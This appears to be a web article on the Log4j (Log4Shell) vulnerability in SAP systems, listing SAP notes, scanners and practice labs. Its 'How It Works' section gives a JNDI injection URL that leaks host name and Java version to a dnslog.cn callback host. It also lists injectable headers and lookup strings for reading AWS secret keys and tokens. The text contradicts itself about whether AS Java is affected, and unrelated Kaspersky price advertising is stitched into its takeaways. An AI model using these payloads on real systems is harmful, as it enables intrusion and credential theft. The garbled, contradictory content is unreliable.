What action is required on Log4j vulnerability on SAP Systems?
You are curious whether your log4j vulnerability on SAP Systems is affected by the zero-day security vulnerability in the log4j library? For those non-cyber security folks wondering what the Log4j vulnerability is, which is possibly the biggest, most dangerous security vulnerability discovered in years (perhaps the most critical after HeartBleed), here it is in a somewhat simple, maybe over simple, way. Log4j is a logging capability in Java, and Java still powers a vast majority of enterprise software, which means Log4j is pretty much everywhere.
Is the log4j used for SAP systems?
Yes, log4j is an apache library used commonly in java applications. This particular issue was identified in log4j2 and fixed in log4j 2.17.0. See more in the document: Apache Log4j Security Vulnerabilities.
What is environment effected?
- SAP NetWeaver Application Server Java all versions
- Library versions Log4j 2.x (below than 2.17.0) are affected
- Library versions Log4j 1.x has not been checked (see Apache Log4j Security Vulnerabilities for more details), although update of the library is recommended; this version is not supported/maintained since 2015.
What are the Java Core componets impacted?
SAP NetWeaver Application Server Java is not impacted by the CVE-2021-44228, CVE-2021-45046 & CVE-2021-45105. This applies to all the AS Java Core Components (Check SAP Note# 1794179)
How to fix it?
Check the below SAP notes:
3129883 – CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 – AS Java Core Components’ impact for Log4j vulnerability.
3129934 – Log4j vulnerabilities – no impact for SAP Data Services, SAP Cloud Integration for Data Services.
3129897 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Adaptive Server Enterprise (ASE)
3130846 – Detecting and remediating log4j CVE-2021-44228 vulnerabilities in SAP Cloud Integration NEO and CF applications
3131007 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Information Steward
3131671 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run
3130900 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run(You can also check the new SAP Solution Manager Tcodes)
3129883 – CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 – AS Java Core Components’ impact for Log4j vulnerability
SAP Developer News on log4j vulnerability
How It Works?
Note: Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged
Specially crafted payload is injected into Headers, Input Fields or Query/Body params
https://target.com/?test=${jndi: ldap://jv-${sys:java.version}-hn-${hostName} .qwe3er.dnslog.cn/exp}
- Use service like dnslog.cn and create your DNS subdomain. Example: qwe3er.dnslog.cn
- Use this subdomain to craft payload and send it with request. Check request to DNS service for confirmation
- You should receive similar request (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn
Test Environments
You can use test environments to inspect the behavior of this vulnerability
https://github.com/leonjza/log4jpwn
https://github.com/christophetd/log4shell-vulnerable-app
Challenges & Labs (Rooms)
You can use created challenges, labs (rooms) to practice this vulnerability
https://pentesterlab.com/exercises/log4j_rce/course
https://tryhackme.com/room/solar
How To Identify (Services You can use this websites to create DNS address (token) for your payload?
https://canarytokens.org
Token Type: Log4Shell
https://dnslog.cn
https://app.interactsh.com
How To Identify (Scanners) You can use this scanner to check if the target website is vulnerable
https://github.com/fullhunt/log4j-scan
https://github.com/adilsoybali/Log4j-RCE-Scanner
What Information can be Extracted?
List of places where Payload can be Injected
Email header,
Username,
Password,
E-mail address,
Filename,
Query/Body,
File content,
Document/Image EXIF, or inside of any of these Headers:
Authorization Originating-Ip X-Remote-Addr
Cache-Control Referer
X-Remote-Ip
Cf-Connecting_ip True-Client-Ip X-Wap-Profile
Client-Ip
User-Agent Authorization: Basic
Contact
X-Api-Version Authorization: Bearer
Cookie
X-Client-Ip Authorization: Oauth
Forwarded-for-Ip X-Forwarded-For Authorization: Token
Forwarded-For
X-Leakix
Forwarded
X-Originating-Ip
If-Modified-Since X-Real-Ip
${hostName}
${sys:os.name}
${sys:user.name} ${sys:os.arch}
${sys:user.home} ${sys:os.version)
${sys:user.dir} ${env:JAVA_VERSION)
${sys:java.home} ${env:AWS_SECRET_ACCESS_KEY}
${sys:java.vendor) ${env: AWS_SESSION_TOKEN)
${sys:java.version) ${env:AWS_SHARED_CREDENTIALS_FILE)
${sys:java.vendor.url} ${env:AWS_WEB_IDENTITY_TOKEN_FILE)
${sys:java.vm.version} ${env: AWS_PROFILE)
${sys:java.vm.vendor} ${eny:AWS_CONFIG_FILE}
${sys:java.vm.name} ${eny:AWS_ACCESS_KEY_ID)
Takeaways
- Handle open source code with extreme skepticism.
- Expand the aperture of hunt and incident response activities to take into account exploit attempts that may have occurred in the prehistory of the vulnerability.
- Build antifragile defenses in depth such that even a critical remote code execution vulnerability like this is just one of many moves an opponent must make in a much grander game of chess
- This product is available at Etsy, Newegg, B&H Photo Video.
- At etsy.com you can purchase Kaspersky Internet Security 2-Devices 1 Year for only C $36.38 , which is 39% less than the cost in B&H Photo Video ($59.99).
- The lowest price of Kaspersky Total Security 2019 3 Devices, 1-Year License, Key Card Code KL1949ABCFS-1921UZZ was obtained on 04/06/2024 4:20 AM.
Related News
SAP Kicks Log4Shell Vulnerability Out of 20 Apps - Threatpost
12/15/2021 - ThreatpostSAP Kicks Log4Shell Vulnerability Out of 20 Apps Threatpost...
Check for Log4j vulnerabilities with this simple-to-use script - TechRepublic
12/28/2021 - TechRepublicCheck for Log4j vulnerabilities with this simple-to-use script TechRepublicLog4j Vulnerability: MSP Software Companies Respond to Log4Shell ChannelE2EMass Scanning Activity for Apache’s Log4j Zero-Day Vulnerability Detected in the Wild CPO MagazineLog4j vulnerability: What to know CBS NewsThe Log4j Vulnerability: Millions of Attempts Made Per Hour to Exploit Software Flaw The Wall Street JournalView Full Coverage on Google News...